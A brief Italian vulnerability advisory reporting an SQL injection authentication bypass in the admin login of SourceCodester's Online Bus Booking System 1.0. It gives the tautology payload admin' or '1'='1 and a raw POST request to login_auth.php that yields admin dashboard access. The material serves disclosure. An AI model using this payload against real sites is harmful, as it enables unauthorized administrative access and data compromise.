
Online Bus Booking System 1.0, esiste un bypass dell'autenticazione nella schermata di login dell'amministratore in admin.php tramite SQL injection su nome utente o password.
Online Bus Booking System 1.0 presenta un bypass dell'autenticazione nella schermata di login Admin in admin.php tramite injection SQL su username o password.
#Fornitore - SourceCodester
#Prodotto -https://www.sourcecodester.com/php/14438/online-bus-booking-system-project-using-phpmysql.html V 1.0
#Tipo di vulnerabilità - Authentication Bypass
#Componente interessato - bus_booking/admin.php
#Tipo di attacco - Locale
#Escalation dei privilegi - true
#Impatto Esecuzione di codice - true
Vettore d'attacco
Vai al pannello di login Admin e prova a bypassarlo
Nel payload della richiesta, imposta
username : admin' or '1'='1
password : admin' or '1'='1
POST /bus_booking/login_auth.php HTTP/1.1
Cookie: PHPSESSID=5d6832eeb2a8dfd424c1b6dcd73745a0
username=admin'+or+'1'%3D'1&password=admin'+or+'1'%3D'1
Accesso riuscito alla Dashboard Admin